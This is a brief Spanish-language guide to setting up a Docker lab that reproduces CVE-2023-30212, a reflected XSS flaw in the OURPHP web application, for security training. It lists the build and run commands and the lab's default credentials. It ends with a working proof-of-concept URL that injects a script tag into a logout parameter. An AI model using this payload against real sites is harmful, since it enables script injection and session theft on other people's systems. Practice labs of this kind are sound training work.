
Entorno vulnerable basado en Docker para practicar la explotación de CVE-2023-30212, con una aplicación web OURPHP con una vulnerabilidad de XSS reflejado para capacitación en seguridad.
git clone https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-.git
ahora para configurar la imagen docker
usa el comando sudo docker build -t work .
usa el comando sudo docker run -d -p 80:80 work
ahora obtendremos el ID del contenedor
ve al navegador y busca localhost ; 127.0.0.1
ahora usa las credenciales
usuario : root
contraseña : docker
base de datos : work
usuario : work contraseña : work
ve a la URL http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
obtendremos un mensaje de alerta como "xss".